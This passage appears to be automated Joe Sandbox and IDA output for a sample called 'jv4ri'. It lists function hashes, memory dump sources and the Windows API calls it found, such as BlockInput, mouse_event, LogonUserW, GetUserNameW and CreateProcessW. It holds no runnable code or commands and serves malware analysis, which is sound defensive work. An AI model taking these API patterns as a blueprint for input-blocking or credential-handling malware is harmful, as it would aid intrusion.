                    • Opcode ID: f6f2017af989a6ff5f91e10d2f6e0857077bc73f2bbe335f06af6d8c6faf88d1
                    • Instruction ID: af4b41845aa651a8f2dd94f64412bb212cb9adaca9a377be53d56d40dc58bf29
                    • Opcode Fuzzy Hash: f6f2017af989a6ff5f91e10d2f6e0857077bc73f2bbe335f06af6d8c6faf88d1
                    • Instruction Fuzzy Hash: 37E0BF76010511EEEB252B60EC09E7777A9EF04350724852DF96680470DB625C91DB10
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,00D04178,00C98F97,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 00C9A39A
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C9A3A3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 7693899cfc56a4fead644170fdb5174bb8067217a9234dd88d6d92c3b23b006d
                    • Instruction ID: 447b3717e7e08a85bb69adea3252c68430350cf0fac61d0cc69c717112c08fd2
                    • Opcode Fuzzy Hash: 7693899cfc56a4fead644170fdb5174bb8067217a9234dd88d6d92c3b23b006d
                    • Instruction Fuzzy Hash: E0B09231054208ABCA102B91EC09BAC3F6AEF44AA2F404024F60D84070CB625456CA96
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3806dc45f6a7a4c6e67d1878b2fe40755c4d78760a5b6a30568834bcd7016818
                    • Instruction ID: 300a8df81ba2254048acc8d0598a09dc2c42406178e21f6ce02aef11638133ec
                    • Opcode Fuzzy Hash: 3806dc45f6a7a4c6e67d1878b2fe40755c4d78760a5b6a30568834bcd7016818
                    • Instruction Fuzzy Hash: BA321422D69F414DDB239634D836336A249AFB73C4F15D73BE829F5AA6EB28D5834100
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7c978ddc5e07b9c8792ab93bcdb9efdad53b1a9c9039ced869ba208912bdbad5
                    • Instruction ID: a9ec06c2b3bc5f415455adc62b7cab97f2cb423a80ac382b691c71f9a7184856
                    • Opcode Fuzzy Hash: 7c978ddc5e07b9c8792ab93bcdb9efdad53b1a9c9039ced869ba208912bdbad5
                    • Instruction Fuzzy Hash: 6BB1F021D2AF514DD32396398831336BB5CAFBB2D9F51D71BFC2AB4E62EB2185834141
                    APIs
                    • __time64.LIBCMT ref: 00CD8B25
                      • Part of subcall function 00C9543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00CD91F8,00000000,?,?,?,?,00CD93A9,00000000,?), ref: 00C95443
                      • Part of subcall function 00C9543A: __aulldiv.LIBCMT ref: 00C95463
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Time$FileSystem__aulldiv__time64
                    • String ID:
                    • API String ID: 2893107130-0
                    • Opcode ID: a5273bb2ada33654a47047a2f79959e6194d864db1a4167c54346db9b2528cd3
                    • Instruction ID: 885c75521535f2be89982232f63b3793502d84e86006d8e2bb37e560da2d568b
                    • Opcode Fuzzy Hash: a5273bb2ada33654a47047a2f79959e6194d864db1a4167c54346db9b2528cd3
                    • Instruction Fuzzy Hash: F421E472635A108BC729CF29D841B52B3E1EBA4311B288E6DD1F5CB3D0CA34B905DB94
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 00CFDB46
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: DialogLongNtdllProc_Window
                    • String ID:
                    • API String ID: 2065330234-0
                    • Opcode ID: 4dd765c8e27e3476fcc6b1abde4a33c54d5548cf97e46fb8d5039eeadcf9925c
                    • Instruction ID: 8d24f7cb6e3bd79f3651372ad3b0d837ddb901dd3fcac38e967fbf87ddf7e0d3
                    • Opcode Fuzzy Hash: 4dd765c8e27e3476fcc6b1abde4a33c54d5548cf97e46fb8d5039eeadcf9925c
                    • Instruction Fuzzy Hash: AF11EB7520411DBBEB655E1DCC05F7A3716E745B20F208215FB639B5E2CA609E00A267
                    APIs
                      • Part of subcall function 00C725DB: GetWindowLongW.USER32(?,000000EB), ref: 00C725EC
                    • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,00CABBA2,?,?,?,?,00000000,?), ref: 00CFD740
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: DialogLongNtdllProc_Window
                    • String ID:
                    • API String ID: 2065330234-0
                    • Opcode ID: ac2f14f0eca3ade08e5da242b6505a450e1769d1e84a016e7b9885e781860da3
                    • Instruction ID: a336a314138bc8c42c3daf7680caae75557eded1b0533a3c3c92aa9772a089d7
                    • Opcode Fuzzy Hash: ac2f14f0eca3ade08e5da242b6505a450e1769d1e84a016e7b9885e781860da3
                    • Instruction Fuzzy Hash: 9A01F53560011CABDB14AF29C889ABA3B93EF45325F044126FA275F191C331AD61D7A2
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                      • Part of subcall function 00C72344: GetCursorPos.USER32(?), ref: 00C72357
                      • Part of subcall function 00C72344: ScreenToClient.USER32(00D367B0,?), ref: 00C72374
                      • Part of subcall function 00C72344: GetAsyncKeyState.USER32(00000001), ref: 00C72399
                      • Part of subcall function 00C72344: GetAsyncKeyState.USER32(00000002), ref: 00C723A7
                    • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00CABC4F,?,?,?,?,?,00000001,?), ref: 00CFC272
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                    • String ID:
                    • API String ID: 2356834413-0
                    • Opcode ID: 9369913a9af0398d7057230aa8713f09af27a7d69d26d2943b9ba50439503ec9
                    • Instruction ID: 97e7016ce5155ee4f7e1cb90b10acbc472247483c0669256935695210a7b2adc
                    • Opcode Fuzzy Hash: 9369913a9af0398d7057230aa8713f09af27a7d69d26d2943b9ba50439503ec9
                    • Instruction Fuzzy Hash: 57F0823020422CABDF04AF49CC45EBE3BA5EB04750F008015F9565B2A2CB75A960EBE1
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00C71B04,?,?,?,?,?), ref: 00C718E2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: DialogLongNtdllProc_Window
                    • String ID:
                    • API String ID: 2065330234-0
                    • Opcode ID: ec36c839f070bc2db6cd42cc076873ac49f841043aa962de1093b6ba39be299a
                    • Instruction ID: c4bfd3c050e02fb7475a81e9a702208e1424d99a1df3a77f5203ab610b083dce
                    • Opcode Fuzzy Hash: ec36c839f070bc2db6cd42cc076873ac49f841043aa962de1093b6ba39be299a
                    • Instruction Fuzzy Hash: 56F0BE70200218AFCB08DF09C850A3A37A2EB04350F40C529FC568B3E0CB31DD50EB60
                    APIs
                    • BlockInput.USER32(00000001), ref: 00CE4218
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: BlockInput
                    • String ID:
                    • API String ID: 3456056419-0
                    • Opcode ID: 0c896449e095c0896db43aaad5f005deb1af93ce8f3248778f64a65b648d7d57
                    • Instruction ID: 801aa26c6c6d3a51eca43adf2b5ce39e2fd868051a346d0ff743fdbaf9ba105f
                    • Opcode Fuzzy Hash: 0c896449e095c0896db43aaad5f005deb1af93ce8f3248778f64a65b648d7d57
                    • Instruction Fuzzy Hash: 75E04F322402149FC710EF5AD845B9AFBE8EF94760F00C02AFD4AC7352DA70E841DBA1
                    APIs
                    • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00CFCBEE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: DialogNtdllProc_
                    • String ID:
                    • API String ID: 3239928679-0
                    • Opcode ID: 780a1aa212655781f32ee6b6b178a0ca947a1d81130113bb74b84dcd48ed73ee
                    • Instruction ID: 6e3b14e998971f073c068ad3d71d5524e10713f8c72c4817cd1402a0d1508011
                    • Opcode Fuzzy Hash: 780a1aa212655781f32ee6b6b178a0ca947a1d81130113bb74b84dcd48ed73ee
                    • Instruction Fuzzy Hash: 35F06D35240259BFDB21DF58DC45FD63B95EB09720F048058BA21672E1CBB0B920E7A1
                    APIs
                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00CD4EEC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: mouse_event
                    • String ID:
                    • API String ID: 2434400541-0
                    • Opcode ID: b348f1e8176610d6e024f940c457c519d2d6aaa7f3a2e762f84d2b64d73d38d2
                    • Instruction ID: 7df6fa03d5b46e786ffabe587a646faf4ef55522be98f29a6b2288653224ef10
                    • Opcode Fuzzy Hash: b348f1e8176610d6e024f940c457c519d2d6aaa7f3a2e762f84d2b64d73d38d2
                    • Instruction Fuzzy Hash: A5D05E981606047BEC2C4B219C5FF778308F300781FD0425BB31299AC1D9F0AD51A031
                    APIs
                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00CC88D1), ref: 00CC8CB3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: LogonUser
                    • String ID:
                    • API String ID: 1244722697-0
                    • Opcode ID: eb28576ed7f757c4a858de24df770ace1d76d03317e9bb516ba139fa8c3724f1
                    • Instruction ID: c19a6996bfe70cac26b1377593020be58f4311c1dcb1379fdffdce59a1c4d679
                    • Opcode Fuzzy Hash: eb28576ed7f757c4a858de24df770ace1d76d03317e9bb516ba139fa8c3724f1
                    • Instruction Fuzzy Hash: 8BD05E3226050EABEF018EA4DC01EBE3B69EB04B01F408111FE15C50A1C775D835EB60
                    APIs
                    • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00CABC0C,?,?,?,?,?,?), ref: 00CFCC24
                      • Part of subcall function 00CFB8EF: _memset.LIBCMT ref: 00CFB8FE
                      • Part of subcall function 00CFB8EF: _memset.LIBCMT ref: 00CFB90D
                      • Part of subcall function 00CFB8EF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D37F20,00D37F64), ref: 00CFB93C
                      • Part of subcall function 00CFB8EF: CloseHandle.KERNEL32 ref: 00CFB94E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                    • String ID:
                    • API String ID: 2364484715-0
                    • Opcode ID: a11aadc239a6b60ad5ff9787e31d3f5977ac16c4b975b04900d431688c987236
                    • Instruction ID: c5334aa379b0335c5869e61c31d54e6b9ff9403bde2682e74529aa55e26bd965
                    • Opcode Fuzzy Hash: a11aadc239a6b60ad5ff9787e31d3f5977ac16c4b975b04900d431688c987236
                    • Instruction Fuzzy Hash: F6E0923520020CEFCB41AF45DE85EA937A5FB1C355F018055FA155B2B2CB31A960EF52
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00C71AEE,?,?,?), ref: 00C716AB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: DialogLongNtdllProc_Window
                    • String ID:
                    • API String ID: 2065330234-0
                    • Opcode ID: 4501d7b220bd76ea42d58781dbcbb23ac9881269ec46e6eb3622f86b2abcd5df
                    • Instruction ID: dd8c401780b71fcb2a9b238189f0845240dc986d05a2259ba53227ffcf0223d4
                    • Opcode Fuzzy Hash: 4501d7b220bd76ea42d58781dbcbb23ac9881269ec46e6eb3622f86b2abcd5df
                    • Instruction Fuzzy Hash: 93E0EC35100208FBCF05AF90DC51F683B2AFB48354F10C418FA494B2A1CA72A922EB60
                    APIs
                    • NtdllDialogWndProc_W.NTDLL ref: 00CFCB75
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: DialogNtdllProc_
                    • String ID:
                    • API String ID: 3239928679-0
                    • Opcode ID: 40dc968f1151b5f52bee004004e340ce39fd3fbd55454204405a2b9a80d4c8a2
                    • Instruction ID: 518788723e125caf530aed55963b06e03fa27a57e17740ca92d33ae83ba74c44
                    • Opcode Fuzzy Hash: 40dc968f1151b5f52bee004004e340ce39fd3fbd55454204405a2b9a80d4c8a2
                    • Instruction Fuzzy Hash: 45E0427524424DAFDB01DF88D885E9A3BA5EB1D700F014054FA1557362CB71A820EB62
                    APIs
                    • NtdllDialogWndProc_W.NTDLL ref: 00CFCBA4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: DialogNtdllProc_
                    • String ID:
                    • API String ID: 3239928679-0
                    • Opcode ID: 1af43cc8738db50079e8d12e6a75bf3789c15986cd560861d8af7bd32081611b
                    • Instruction ID: 5f2becdb93b32c3a1baff75ce5fdf9dc69928ee5934931404389a6fe4d5e3737
                    • Opcode Fuzzy Hash: 1af43cc8738db50079e8d12e6a75bf3789c15986cd560861d8af7bd32081611b
                    • Instruction Fuzzy Hash: 86E0427524024DEFDB01DF88D985E9A3BA5EB1D700F018054FA1547362CB71A860EBA2
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                      • Part of subcall function 00C7201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00C720D3
                      • Part of subcall function 00C7201B: KillTimer.USER32(-00000001,?,?,?,?,00C716CB,00000000,?,?,00C71AE2,?,?), ref: 00C7216E
                    • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00C71AE2,?,?), ref: 00C716D4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                    • String ID:
                    • API String ID: 2797419724-0
                    • Opcode ID: 6fab60ab6c8047291bd2b0e794e678f131977c7daffad45086b88c5f57bc829d
                    • Instruction ID: 791fd8fe067907303f2a79cc57f646421b4e3efe748e54ee0d3590b6051dd5f7
                    • Opcode Fuzzy Hash: 6fab60ab6c8047291bd2b0e794e678f131977c7daffad45086b88c5f57bc829d
                    • Instruction Fuzzy Hash: FDD01270140308B7DA102B50DC17F5D3A19DB14790F40C021BA09291D3CAB1A810F569
                    APIs
                    • GetUserNameW.ADVAPI32(?,?), ref: 00CB2242
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: 4b121ef616beb42abdf32ecd3d22325aae519010457389f4fc7c38bc47ffdec8
                    • Instruction ID: 8eab4f17f2cd1fbcab4c6486f9f57b8e75853b4f80aa0269313fb4796ca180b6
                    • Opcode Fuzzy Hash: 4b121ef616beb42abdf32ecd3d22325aae519010457389f4fc7c38bc47ffdec8
